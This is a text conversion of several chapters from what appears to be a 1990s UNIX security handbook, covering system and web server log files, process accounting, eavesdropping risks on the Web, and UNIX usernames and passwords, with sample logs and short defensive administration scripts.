
After they have reviewed it, "walk through" the code with them and explain what each part does.<br />

We have found that such reviews are a surefire way to discover logic errors. Trying to explain why<br />

something is done a certain way often results in an exclamation of "Wait a moment ...why did I do<br />

that?"<br />

If you need to use a shell as part of your program, don't use the C shell.<br />

Many versions have known flaws that can be exploited, and nearly every version performs an<br />

implicit eval $TERM on start-up, enabling all sorts of attacks. Furthermore, the C shell makes it<br />

difficult to do things that you may want to do, such as capture error output to another file or pipe.<br />

We recommend the use of ksh93 (used for most of the shell scripts in this book). It is well<br />

designed, fast, powerful, and well documented (see Appendix D).<br />

Remember, many security bugs are actually programming bugs, which is good news for programmers.<br />

When you make your program more secure, you'll simultaneously be making it more reliable.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch23_02.htm (7 of 8) [2002-04-12 10:44:26]


[Chapter 23] 23.2 Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

23.1 One Bug Can Ruin Your<br />

Whole Day...<br />

23.3 Tips on Writing Network<br />

Programs<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch23_02.htm (8 of 8) [2002-04-12 10:44:26]


[Chapter 10] 10.3 Program-Specific Log Files<br />

Chapter 10<br />

Auditing and Logging<br />

10.3 Program-Specific Log Files<br />

Depending on the version of <strong>UNIX</strong> you are using, you may find a number of other log files in your log file directory.<br />

10.3.1 aculog File<br />

The tip command and the Berkeley version of the UUCP commands record information in the aculog file each time<br />

they make a telephone call. The information recorded includes the account name, date, time, entry in the /etc/remote<br />

file that was used to place the call, phone number dialed, actual device used, and whether the call was successful or<br />

not.<br />

Here is a sample log:<br />

tomh (Mon Feb 13 08:43:03 1995) call aborted<br />

tomh (Tue Mar 14 16:05:00 1995) call completed<br />

carol (Tue Mar 14 18:08:33 1995) call completed<br />

In the first two cases, the user tomh connected directly to the modem. In these cases, the phone number dialed was not<br />

recorded.<br />

Most Hayes-compatible modems can be put into command mode by sending them a special "escape sequence."<br />

Although you can disable this feature, many sites do not. In those cases, there is no way to be sure if the phone<br />

numbers listed in the aculog are in fact the phone numbers that were called by your particular user. You also do not<br />

have any detailed information about how long each call was.<br />

10.3.2 sulog Log File<br />

Some versions of <strong>UNIX</strong> record attempts to use the sucommand by printing to the console (and therefore to the<br />

messages log file). In addition, some recent versions specially log su attempts to the log file sulog.<br />

Under some versions of System V-related <strong>UNIX</strong>, you can determine logging via settings in the /etc/default/su file.<br />

Depending on the version involved, you may be able to set the following:<br />

# A file to log all su attempts<br />

SULOG=/var/adm/sulog<br />

# A device to log all su attempts<br />

CONSOLE=/dev/console<br />

# Whether to also log using the syslog facility<br />

SYSLOG=yes<br />

Here is a sample sulog from a computer running Ultrix V4.2A:<br />

BADSU: han /dev/ttyqc Wed Mar 8 16:36:29 1995<br />

BADSU: han /dev/ttyqc Wed Mar 8 16:36:40 1995<br />

BADSU: rhb /dev/ttyvd Mon Mar 13 11:48:58 1995<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch10_03.htm (1 of 5) [2002-04-12 10:44:27]


[Chapter 10] 10.3 Program-Specific Log Files<br />

SU: rhb /dev/ttyvd Mon Mar 13 11:49:39 1995<br />

As you can see, the user han apparently didn't know the superuser password, whereas the user rhb apparently<br />

mistyped the password the first time and typed it correctly on the second attempt.<br />

Scanning the sulog is a good way to figure out if your users are trying to become the superuser by searching for<br />

passwords. If you see dozens of su attempts from a particular user who is not supposed to have access to the superuser<br />

account, you might want to ask him what is going on. Unfortunately, if a user actually does achieve the powers of the<br />

superuser account, he can use those powers to erase his BADSU attempts from the log file. For this reason, you might<br />

want to have BADSU attempts logged to a hardcopy printer or to a remote, secure computer on the <strong>Internet</strong>. See the<br />

<strong>Sec</strong>tion 10.5.2.1, "Logging to a printer" and <strong>Sec</strong>tion 10.5.2.2, "Logging across the network" later in this chapter.<br />

10.3.3 xferlog Log File<br />

If your computer uses the Washington University FTP server, then you can configure your server to log all files<br />

transferred. The default filename for this log is xferlog, and the default location is the directory /var/adm/. The<br />

location is defined by the configuration variable _PATH_XFERLOG in the file pathnames.h.<br />

The following information is recorded in the file xferlog for each file transferred:<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

Date and time of transfer<br />

Name of the remote host that initiated the transfer<br />

Size of the file that was transferred<br />

Name of the file that was transferred<br />

Mode of the file that was transferred (a for ASCII; b for binary)<br />

Special action flag (C for compressed; U for uncompressed; T for tar archive)<br />

Direction of the transfer (o for outgoing, i for incoming)<br />

The kind of user who was logged in (a for anonymous user; g for guest; and r for a local user who was<br />

authenticated with a password)<br />

Here is a sample from the xferlog on a server:<br />

Sat Mar 11 20:40:14 1995 329 CU-DIALUP-0525.CIT.CORNELL.EDU 426098<br />

/pub/simson/scans/91.Globe.Arch.ps.gz b _ o a ckline@tc.cornell.edu ftp 0*<br />

Mon Mar 13 01:32:29 1995 9 slip-2-36.ots.utexas.edu 14355<br />

/pub/simson/clips/95.Globe.IW.txt a _ o a mediaman@mail.utexas.edu ftp 0 *<br />

Mon Mar 13 23:30:42 1995 1 mac 52387 /u/beth/.newsrc a _ o r bethftp 0 *<br />

Tue Mar 14 00:04:10 1995 1 mac 52488 /u/beth/.newsrc a _ i r bethftp 0 *<br />

The last two entries were generated by a user who was running the Newswatcher netnews program on a Macintosh<br />

computer. At 23:30, Newswatcher retrieved the user's .newsrc file; at 00:04 the next morning, the .newsrc file was<br />

sent back.<br />

10.3.4 uucp Log Files<br />

Derivatives of the BNU version of UUCP (the version you are most likely to encounter on non-Linux systems) may<br />

have comprehensive logging available. These log files are normally contained in the /var/spool/uucp/.Admin directory.<br />

These include logs of transfers, foreign contacts, and user activity. Of most interest is the file security, if it exists. This<br />

file records instances at which violations of restrictions are attempted using the UUCP system.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch10_03.htm (2 of 5) [2002-04-12 10:44:27]


[Chapter 10] 10.3 Program-Specific Log Files<br />

One type of record present may indicate attempts to make prohibited transfers of files. These records start with the tag<br />

xfer and contain the name and user on the requesting and destination hosts involved in the command, information to<br />

identify the file name and size, and information about the time and date of transfer.<br />

The other type of record starts with the tag "rexe" and indicates attempts to execute a command that is not allowed.<br />

This record will contain the name and user on the requesting and destination hosts involved in the command, the date<br />

and time of the attempt, and the command and options involved.<br />

The exact format of the fields may differ slightly from system to system, so check your documentation for exact<br />

details.<br />

We suggest that you monitor this file for changes so you will be aware of any problems that are recorded. Because the<br />

directory is not one you might otherwise monitor, you may wish to write a shell script (similar to the one shown<br />

below) to put in the crontab to run every few hours:<br />

#!/bin/ksh<br />

# set the following to indicate the user to notify of a new<br />

# security record<br />

typeset User=root<br />

cd /var/spool/uucp/.Admin<br />

if [[ -r security.mark ]]<br />

then<br />

if [[ security -nt security.mark ]]<br />

then<br />

comm -3 security security.mark | tee -a security.mark |<br />

/bin/mailx -s "New uucp security record" $User<br />

fi<br />

else<br />

touch security.mark<br />

fi<br />

10.3.5 access_log Log File<br />

If you are running the NCSA HTTPD server for the World Wide Web, then you can determine which sites have been<br />

contacting your system and which files have been downloaded by examining the log file access_log.[6]<br />

[6] Other WWW servers also log this information, but we will only present this one as an example. See<br />

your documentation for details about your own server.<br />

The HTTPD server allows you to specify where the access_log file is kept; by default, it is kept in the directory<br />

/usr/local/etc/http/logs.<br />

Each line in the log file consists of the following information:<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

Name of the remote computer that initiated the transfer<br />

Remote login name, if it was supplied, or "-" if not supplied<br />

Remote username, if supplied, or "-" if not supplied<br />

Time that the transfer was initiated (day of month, month, year, hour, minute, second, and time zone offset)<br />

HTTP command that was executed (usually GET)<br />

Status code that was returned<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch10_03.htm (3 of 5) [2002-04-12 10:44:27]


[Chapter 10] 10.3 Program-Specific Log Files<br />

●<br />

Number of bytes that were transferred<br />

Here are some sample log entries:<br />

port15.ts1.msstate.edu - - [09/Apr/1995:11:55:37 -0400] "GET /simson<br />

HTTP/1.0" 302 -<br />

ayrton.eideti.com - - [09/Apr/1995:11:55:37 -0400] "GET /unix-haterstitle.gif<br />

HTTP/1.0" 200 49152<br />

port15.ts1.msstate.edu - - [09/Apr/1995:11:55:38 -0400] "GET /simson/<br />

HTTP/1.0" 200 1248<br />

mac-22.cs.utexas.edu - - [09/Apr/1995:14:32:50 -0400] "GET /unixhaters.html<br />

HTTP/1.0" 200 2871<br />

204.32.162.175 - - [09/Apr/1995:14:33:21 -0400] "GET<br />

/wedding/slides/020.jpeg HTTP/1.0" 200 9198<br />

mac-22.cs.utexas.edu - - [09/Apr/1995:14:33:53 -0400] "GET /unixhaters-title.gif<br />

HTTP/1.0" 200 58092<br />

One program for analyzing the access_log log file is getstats, available via anonymous FTP from a number of servers.<br />

This program can tell you how many people have accessed your server, where they are coming from, what files are the<br />

most popular, and a variety of other interesting statistics. We have had good results with getstats. For further<br />

information on getstats, check:<br />

http://www.eit.com/software/getstats/getstats.html<br />

10.3.6 Logging Network Services<br />

Some versions of the inetd <strong>Internet</strong> services daemon have a "-t" (trace) option that can be used for logging incoming<br />

network services. To enable inetd logging, locate the startup file from which inetd is launched and add the -t option.<br />

For example, under Solaris 2.4, inetd is launched in the file /etc/rc2.d/S72inetsvc by the following line:<br />

#<br />

# Run inetd in "standalone" mode (-s flag) so that it doesn't have<br />

# to submit to the will of SAF. Why did we ever let them change inetd?<br />

#<br />

/usr/sbin/inetd -s<br />

To enable logging of incoming TCP connections, the last line should be changed to read:<br />

/usr/sbin/inetd -t -s<br />

Logs will appear in /var/adm/messages. For example:<br />

Jan 3 10:58:57 vineyard.net inetd[4411]: telnet[4413] from 18.85.0.2<br />

Jan 3 11:00:38 vineyard.net inetd[4411]: finger[4444] from 18.85.0.2 4599<br />

Jan 3 11:00:42 vineyard.net inetd[4411]: systat[4446] from 18.85.0.2 4600<br />

If your version of inetd does not support logging (and even if it does), consider using the tcpwrapper, discussed in<br />

Chapter 22, Wrappers and Proxies.<br />

10.3.7 Other Logs<br />

There are many other possible log files on <strong>UNIX</strong> systems that may result from third-party software. Usenet news<br />

programs, gopher servers, database applications, and many other programs often generate log files both to show usage<br />

and to indicate potential problems. The files should be monitored on a regular basis.<br />

As a suggestion, consider putting all these logs in the same directory. If you cannot do that, use a symbolic link from<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch10_03.htm (4 of 5) [2002-04-12 10:44:27]


[Chapter 10] 10.3 Program-Specific Log Files<br />

the log file's hard-coded location to the new log file in a common directory (assuming that your system supports<br />

symbolic links). This link will facilitate writing scripts to monitor the files and tracking the log files present on your<br />

system.<br />

NOTE: Many systems have cron jobs which rotate the log files. If these scripts do not know about your<br />

symbolic links, you won't get what you expect! Instead of having your log files rotated, the symbolic link<br />

will be renamed and a new file created in its old place, rather than where the symbolic link pointed.<br />

10.2 The acct/pacct Process<br />

Accounting File<br />

10.4 Per-User Trails in the<br />

Filesystem<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch10_03.htm (5 of 5) [2002-04-12 10:44:27]


[Chapter 18] 18.4 Avoiding the Risks of Eavesdropping<br />

Chapter 18<br />

WWW <strong>Sec</strong>urity<br />

18.4 Avoiding the Risks of Eavesdropping<br />

The risks of eavesdropping affect all <strong>Internet</strong> protocols, but are of particular concern on the World Wide Web, where sensitive documents and other kinds of information, such as credit card numbers, may be transmitted. There are only two ways to protect information from eavesdropping. The<br />

first is to assure that the information travels over a physically secure network (which the <strong>Internet</strong> is not). The second is to encrypt the information so that it can only be decrypted by the intended recipient.<br />

Another form of eavesdropping that is possible is traffic analysis. In this type of eavesdropping, an attacker learns about the transactions performed by a target, without actually learning the content. As we will see below, the log files kept by Web servers are particularly vulnerable to this type<br />

of attack.<br />

18.4.1 Eavesdropping Over the Wire<br />

Information sent over the <strong>Internet</strong> must be encrypted to be protected from eavesdropping. There are four ways in which information sent by the Web can be encrypted:<br />

1. Link encryption. The long-haul telephone lines that are used to carry the IP packets can be encrypted. Organizations can also use encrypting routers to automatically encrypt information sent over the <strong>Internet</strong> that is destined for another office. Link encryption provides for the<br />

encryption of all traffic, but it can only be performed with prior arrangement. Link encryption has traditionally been very expensive, but new generations of routers and firewalls are being produced that incorporate this feature.<br />

2. Document encryption. The documents that are placed on the Web server can be encrypted with a system such as PGP. Although this encryption provides for effective privacy protection, it is cumbersome because it requires the documents to be specially encrypted before they are<br />

placed on the server and they must be specially decrypted when they are received.<br />

3. SSL (<strong>Sec</strong>ure Socket Layer). SSL is a system designed by Netscape Communications that provides an encrypted TCP/IP pathway between two hosts on the <strong>Internet</strong>. SSL can be used to encrypt any TCP/IP protocol, such as HTTP, TELNET, or FTP.<br />

SSL can use a variety of public-key and token-based systems for exchanging a session key. Once a session key is exchanged, it can use a variety of secret key algorithms. Currently, programs that use SSL that are distributed for anonymous FTP on the <strong>Internet</strong> and that are sold to<br />

international markets are restricted to using a 40-bit key, which should not be considered secure.<br />

A complete description of the SSL protocol can be found at the site http://home.netscape.com/newsref/std/SSL.html.<br />

4. SHTTP (<strong>Sec</strong>ure HTTP). <strong>Sec</strong>ure HTTP is an encryption system for HTTP designed by Commerce Net. SHTTP only works with HTTP.<br />

A complete description of the SHTTP protocol can be found at http://www.eit.com/projects/s-http/.<br />

It is widely believed that most commercial Web servers that seek to use encryption will use either SSL or SHTTP. Unlike the other options above, both SSL and SHTTP require special software to be running on both the Web server and in the Web browser. This software will likely be in most<br />

commercial Web browsers within a few months after this book is published, although it may not be widespread in freely available browsers until the patents on public key cryptography expire within the coming years.<br />

When using an encrypted protocol, your security depends on several issues:<br />

● The strength of the encryption algorithm<br />

● The length of the encryption key<br />

● The secrecy of the encryption key<br />

● The reliability of the underlying software that is running on the Web server<br />

● The reliability of the underlying software that is running on the Web client<br />

During the summer of 1995, a variety of articles were published describing failures of the encryption system used by the Netscape Navigator. In the first case, a researcher in France was able to break the encryption key used on a single message by using a network of workstations and two<br />

supercomputers. The message had been encrypted with the international version of the Netscape Navigator using a 40-bit RC4 key. In the second case, a group of students at the University of California at Berkeley discovered a flaw in the random number generator used by the <strong>UNIX</strong>-based<br />

version of Navigator. [3] In the third case, the same group of students at Berkeley discovered a way to alter the binaries of the Navigator program as they traveled between the university's NFS server and the client workstation on which the program was actually running.[4]<br />

[3] The random number generator was seeded with a number that depended on the current time and the process number of the Navigator process.<br />

[4] The students pointed out that while they attacked the Navigator's binaries as it was moving from the server computer to the client, they could have as easily have attacked the program as it was being downloaded from an FTP site.<br />

All of these attacks are highly sophisticated. Nevertheless, most of them do not seem to be having an impact on the commercial development of the Web. It is likely that within a few years the encryption keys will be lengthened to 64 bits. Netscape has improved the process by which its<br />

Navigator program seeds its random number generator. The third problem, of binaries being surreptitiously altered, will likely not be a problem for most users with improved software distribution systems that themselves use encryption and digital signatures.<br />

18.4.2 Eavesdropping Through Log Files<br />

Most Web servers create log files that record considerable information about each request. These log files grow without limit until they are automatically trimmed or until they fill up the computer's hard disk (usually resulting in a loss of service). By examining these files, it is possible to infer<br />

a great deal about the people who are using the Web server.<br />

For example, the NCSA httpd server maintains the following log files in its logs/ directory:<br />

access_log<br />

A list of the individual accesses to the server.<br />

agent_log<br />

A list of the programs that have been used to access the server.<br />

error_log<br />

A list of the errors that the server has experienced, whether generated by the server itself or by your CGI scripts. (Anything that a script prints to Standard Error is appended into this file.)<br />

refer_log<br />

This log file contains entries that include the URL that the browser previously visited and the URL that it is currently viewing.<br />

By examining the information in these log files, you can create a very comprehensive picture of the people who are accessing a Web server, the information that they are viewing, and where they have previously been.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch18_04.htm (1 of 2) [2002-04-12 10:44:27]


[Chapter 18] 18.4 Avoiding the Risks of Eavesdropping<br />

In Chapter 10, Auditing and Logging, we describe the fields that are stored in the access_log file. Here they are again:<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

The name of the remote computer that initiated the transfer<br />

The remote login name, if it was supplied, or "-" if not supplied<br />

The remote username, if supplied, or "-" if not supplied<br />

The time that the transfer was initiated (day of month, month, year, hour, minute, second, and time zone offset)<br />

The HTTP command that was executed (can be GET for receiving files, POST for processing forms, or HEAD for viewing the MIME header)<br />

The status code that was returned<br />

The number of bytes that were transferred<br />

Here are a few lines from an access_log file:<br />

koriel.sun.com - - [06/Dec/1995:18:44:01 -0500] "GET /simson/resume.html HTTP/1.0" 200 8952<br />

lawsta11.oitlabs.unc.edu - - [06/Dec/1995:18:47:14 -0500] "GET /simson/ HTTP/1.0" 200 2749<br />

lawsta11.oitlabs.unc.edu - - [06/Dec/1995:18:47:15 -0500] "GET /icons/back.gif HTTP/1.0" 200 354<br />

lawsta11.oitlabs.unc.edu - - [06/Dec/1995:18:47:16 -0500] "GET /cgi-bin/counter?file=simson HTTP/1.0" 200 545<br />

piweba1y-ext.prodigy.com - - [06/Dec/1995:18:52:30 -0500] "GET /vineyard/history/" HTTP/1.0" 404 -<br />

As you can tell, there is a wealth of information here. Apparently, some user at Sun Microsystems is interested in Simson's resume. A user at the University of North Carolina also seems interested in Simson. And a Prodigy user appears to want information about the history of Martha's<br />

Vineyard.<br />

None of these entries in the log file contain the username of the person conducting the Web request. But they may still be used to identify individuals. It's highly likely that koreil.sun.com is a single SPARCstation sitting on a single employee's desk at Sun. We don't know what<br />

lawsta11.otilabs.unc.edu is, but we suspect that it is a single machine in a library. Many organizations now give distinct IP addresses to individual users for use with their PCs, or for dial-in with PPP or SLIP. Without the use of a proxy server such as SOCKS (see Chapter 22) or systems that<br />

rewrite IP addresses, Web server log files reveal those addresses.<br />

And there is more information to be "mined" as well. Consider the following entries from the refer_log file:<br />

http://www2.infoseek.com/NS/Titles?qt=unix-hater -> /unix-haters.html<br />

http://www.intersex.com/main/ezines.html -> /awa/<br />

http://www.jaxnet.com/~jdcarr/places.html -> /vineyard/ferry.tiny.gif<br />

In the first line, it's clear that a search on the InfoSeek server for the string "unixhater" turned up the Web file /unix-haters.html on the current server. This is an indication that the user was surfing the Web looking for material having to deal with <strong>UNIX</strong>. In the second line, a person who had<br />

been browsing the InterSex WWW server looking for information about electronic magazines followed a link to the /awa/ directory. This possibly indicates that the user is interested in content of a sexually oriented nature. In the last example, apparently a user, jdcarr@jaxnet.com, has<br />

embedded a link in his or her places.html file to a GIF file of the Martha's Vineyard ferry. This indicates that jdcarr is taking advantage of other people's network servers and <strong>Internet</strong> connections.<br />

By themselves, these references can be amusing. But they can also be potentially important. Lincoln Stein and Bob Bagwill note in the World Wide Web <strong>Sec</strong>urity FAQ that a referral such as this one could indicate that a person is planning a corporate takeover:<br />

file://prez.xyz.com/hotlists/stocks2sellshort.html ->http://www.xyz.com<br />

The information in the refer_log can also be combined with information in the access_log to determine the names of the people (or at least their computers) who are following these links. Version 1.5 of the NCSA httpd Web server even has an option to store referrals in the access log.<br />

The access_log file contains the name of the complete URL that is provided. For Web forms that use the GET method instead of the POST method, all of the arguments are included in the URL, and thus all of them end up in the access_log file.<br />

Consider the following:<br />

asy2.vineyard.net - - [06/Oct/1995:19:04:37 -0400] "GET<br />

/cgi-bin/vni/useracct?username=bbennett&password=leonlikesfood&cun=jayd&fun=jay+Desmond&pun=766WYRCI&add1=box+634&add2=&city=Gay+Head&state=MA&zip=02535&phone=693-9766&choice=ReallyCreateUser<br />

HTTP/1.0" 200 292<br />

Or even this one:<br />

mac.vineyard.net - - [07/Oct/1995:03:04:30 -0400] "GET<br />

/cgi-bin/change-password?username=bbennett&oldpassword=dearth&newpassword=flabby3 HTTP/1.0" 200 400<br />

This is one reason why you should use the POST method in preference to the GET method!<br />

Finally, consider what can be learned from agent_log. Here are a few sample lines:<br />

NCSA_Mosaic/2.6 (X11;HP-UX A.09.05 9000/720) libwww/2.12 modified via proxy gateway CERN-HTTPD/3.0<br />

libwww/2.17<br />

NCSA_Mosaic/2.6 (X11;HP-UX A.09.05 9000/720) libwww/2.12 modified via proxy gateway CERN-HTTPD/3.0<br />

libwww/2.17<br />

Proxy gateway CERN-HTTPD/3.0 libwww/2.17<br />

Mozilla/1.1N (X11; I; OSF1 V3.0 alpha) via proxy gateway CERN-HTTPD/3.0 libwww/2.17<br />

Mozilla/1.2b1 (Windows; I; 16bit)<br />

In addition to the name of the Web browser that is being used, this file reveals information about the structure of an organization's firewall. It also reveals the use of beta software within an organization.<br />

Some servers allow you to restrict the amount of information that is logged. If you do not require information to be logged, you may wish to suppress the logging.<br />

In summary, users of the Web should be informed that their actions are being monitored. As many firms wish to use this information for marketing, it is quite likely that the amount of information that Web browsers provide to servers will, rather than decrease, increase in the future.<br />

18.3 Controlling Access to<br />

Files on Your Server<br />

18.5 Risks of Web Browsers<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch18_04.htm (2 of 2) [2002-04-12 10:44:27]


[Chapter 10] 10.2 The acct/pacct Process Accounting File<br />

Chapter 10<br />

Auditing and Logging<br />

10.2 The acct/pacct Process Accounting File<br />

In addition to logins and logouts, <strong>UNIX</strong> can log every single command run by every single user. This<br />

special kind of logging is often called process accounting; normally, process accounting is used only in<br />

situations where users are billed for the amount of CPU time that they consume. The acct or pacct file can<br />

be used after a break-in to help determine what commands a user executed (provided that the log file is not<br />

deleted.) This command can also be used for other purposes, such as seeing if anyone is using some old<br />

software you wish to delete, or who is playing games on the fileserver.<br />

The lastcomm or acctcom program displays the contents of this file in a human-readable format:<br />

% lastcomm<br />

sendmail F root __ 0.05 secs Sat Mar 11 13:28<br />

mail S daemon __ 0.34 secs Sat Mar 11 13:28<br />

send dfr __ 0.05 secs Sat Mar 11 13:28<br />

post dfr ttysf 0.11 secs Sat Mar 11 13:28<br />

sendmail F root __ 0.09 secs Sat Mar 11 13:28<br />

sendmail F root __ 0.23 secs Sat Mar 11 13:28<br />

sendmail F root __ 0.02 secs Sat Mar 11 13:28<br />

anno dfr ttys1 0.14 secs Sat Mar 11 13:28<br />

sendmail F root __ 0.03 secs Sat Mar 11 13:28<br />

mail S daemon __ 0.30 secs Sat Mar 11 13:28<br />

%<br />

If you have an intruder on your system and he has not edited or deleted the /var/adm/acct file, lastcomm<br />

will provide you with a record of the commands that the intruder used.[5] Unfortunately, <strong>UNIX</strong> accounting<br />

does not record the arguments to the command typed by the intruder, nor the directory in which the<br />

command was executed. Thus, keep in mind that a program named vi and executed by a potential intruder<br />

might actually be a renamed version of cc - you have no way to tell for certain by examining this log file.<br />

[5] lastcomm can work in two ways: by the system administrator to monitor attackers, or by an<br />

attacker to see if the administrator is monitoring him. For this reason, some administrators<br />

change the permission mode of the log file so that only the superuser can read its contents.<br />

On systems that have even moderate use, the /var/adm/acct file grows very quickly - often more than one or<br />

two megabytes per day. For this reason, most sites that use accounting run the command sa or runacct on a<br />

nightly basis. The command processes the information in the acct or pacct file into a summary file, which is<br />

often kept in /var/adm/savacct.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch10_02.htm (1 of 3) [2002-04-12 10:44:28]


[Chapter 10] 10.2 The acct/pacct Process Accounting File<br />

10.2.1 Accounting with System V<br />

On SVR4 systems, you start the accounting with the command:<br />

# /usr/lib/acct/startup<br />

The accounting file on these systems is usually /var/adm/pacct and it is read with the acctcom command.<br />

The acctcom command has more than 20 options, and can provide a variety of interesting summaries. You<br />

should check your manual entry to become familiar with the possibilities.<br />

Accounting is performed by the <strong>UNIX</strong> kernel. Every time a process terminates, the kernel writes a 32-byte<br />

record to the /var/adm/acct file that includes:<br />

●<br />

●<br />

●<br />

●<br />

Name of the user who ran the command<br />

Name of the command<br />

Amount of CPU time used<br />

Time that the process exited<br />

● Flags, including:<br />

S Command was executed by the superuser.<br />

F Command ran after a fork, but without an exec.<br />

D Command generated a core file when it exited.<br />

X Command was terminated by signal<br />

10.2.2 Accounting with BSD<br />

You can turn on accounting by issuing the accton command:<br />

# accton filename<br />

Depending on your version of <strong>UNIX</strong>, you may find the accton command in /usr/etcor in /usr/lib/acct. The<br />

filename specifies where accounting information should be kept. It is typically /var/adm/acct or<br />

/var/adm/acct. The file is read with the lastcomm command.<br />

Back Up Your Logs!<br />

Log files are a valuable resource. For this reason, many sites set up jobs in their crontab files to back up the<br />

logs every day.<br />

One way to back up your logs is to back up each log one file at a time. At one site, seven days worth of the<br />

log file /usr/spool/mqueue/syslog are automatically kept in the files syslog.1, syslog.2, syslog.3 ... syslog.7.<br />

Other sites set up shell scripts that automatically back up their log files and compress the backups.<br />

A simple way to back up your log is to have a shell script that runs every night and uses the tar command to<br />

archive your entire /var/adm directory, then uses the compress command to shorten the resulting output file.<br />

The following script could run at midnight each night and make the appropriate backups into<br />

/var/adm.backups:<br />

#!/bin/ksh<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch10_02.htm (2 of 3) [2002-04-12 10:44:28]


[Chapter 10] 10.2 The acct/pacct Process Accounting File<br />

BFILE=$(date +backup.%y.%m.%d.tar.Z)<br />

cd /var/adm<br />

tar cf - . | compress > ../adm.backups/$BFILE<br />

exit 0<br />

10.2.3 messages Log File<br />

Many versions of <strong>UNIX</strong> place a copy of any message printed on the system console in a file called<br />

/usr/adm/messages or /var/adm/messages. This can be particularly useful, as it does not require the use of<br />

special software for logging - only a call to printf in a C program or an echo statement in a shell script.<br />

Here is a sample of the /var/adm/messages file from a computer running SunOS version 4.1:<br />

Mar 14 14:30:58 bolt su: 'su root' succeeded for tanya on /dev/ttyrb<br />

Mar 14 14:33:59 bolt vmunix: /home: file system full<br />

Mar 14 14:33:59 bolt last message repeated 8 times<br />

Mar 14 14:33:59 bolt vmunix: /home: file system full<br />

Mar 14 14:33:59 bolt last message repeated 16 times<br />

As you can see, the computer bolt is having a problem with a filled disk.<br />

10.1 The Basic Log Files 10.3 Program-Specific Log<br />

Files<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch10_02.htm (3 of 3) [2002-04-12 10:44:28]


[Chapter 3] Users and Passwords<br />

Chapter 3<br />

3. Users and Passwords<br />

Contents:<br />

Usernames<br />

Passwords<br />

Entering Your Password<br />

Changing Your Password<br />

Verifying Your New Password<br />

The Care and Feeding of Passwords<br />

One-Time Passwords<br />

Summary<br />

This chapter explains the <strong>UNIX</strong> user account and password systems. It also discusses what makes a good<br />

password.<br />

Good password security is part of your first line of defenses against system abuse.[1] People trying to<br />

gain unauthorized access to your system often try to guess the passwords of legitimate users. Two<br />

common and related ways to do this are by trying many possible passwords from a database of common<br />

passwords, and by stealing a copy of your organization's password file and trying to crack the encrypted<br />

passwords that it contains.<br />

[1] Another part of your first line of defense is physical security, which may prevent an<br />

attacker from simply carting your server through the lobby without being questioned. See<br />

Chapter 12, Physical <strong>Sec</strong>urity for details.<br />

After an attacker gains initial access, he or she is free to snoop around, looking for other security holes to<br />

exploit to attain successively higher privileges. The best way to keep your system secure is to keep<br />

unauthorized users out of the system in the first place. This means teaching your users what good<br />

password security means and making sure they adhere to good security practices.<br />

Sometimes even good passwords aren't sufficient. This is especially true in cases where passwords need<br />

to travel across unprotected networks. With default network protocols and defenses, these passwords<br />

may be sniffed - read from the network by someone not authorized to know the passwords. In cases of<br />

this kind, one-time passwords are necessary.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch03_01.htm (1 of 3) [2002-04-12 10:44:28]


[Chapter 3] Users and Passwords<br />

3.1 Usernames<br />

Every person who uses a <strong>UNIX</strong> computer should have an account. An account is identified by a<br />

username. Traditionally, each account also has a secret password associated with it to prevent<br />

unauthorized use. Usernames are sometimes called account names. You need to know both your<br />

username and your password to log into a <strong>UNIX</strong> system. For example, Rachel Cohen has an account on<br />

her university's computer system. Her username is rachel. Her password is "Iluvfred." When she wants to<br />

log into the university's computer system, she types:<br />

login: rachel<br />

password: Iluvfred<br />

The username is an identifier: it tells the computer who you are. The password is an authenticator: you<br />

use it to prove to the operating system that you are who you claim to be.<br />

Standard <strong>UNIX</strong> usernames may be between one and eight characters long. Within a single <strong>UNIX</strong><br />

computer, usernames must be unique: no two users can have the same one. (If two people did have the<br />

same username, then they would really be sharing the same account.) <strong>UNIX</strong> passwords are also between<br />

one and eight characters long, although some commercial <strong>UNIX</strong> systems now allow longer passwords.<br />

Longer passwords are usually more secure because they are harder to guess. More than one user can<br />

theoretically have the same password, although if they do, that indicates that both users have picked a<br />

bad password.<br />

A single person can have more than one <strong>UNIX</strong> account on the same computer. In this case, each account<br />

would have its own username. A username can be any sequence of characters you want (with some<br />

exceptions), and does not necessarily correspond to a real person's name.<br />

NOTE: Some versions of <strong>UNIX</strong> have problems with usernames that do not start with a<br />

lowercase letter or that contain special characters such as punctuation or control characters.<br />

Usernames containing certain unusual characters will also cause problems for various<br />

application programs, including some network mail programs. For this reason, many sites<br />

allow only usernames that contain lowercase letters and numbers and that start with a<br />

lowercase letter.<br />

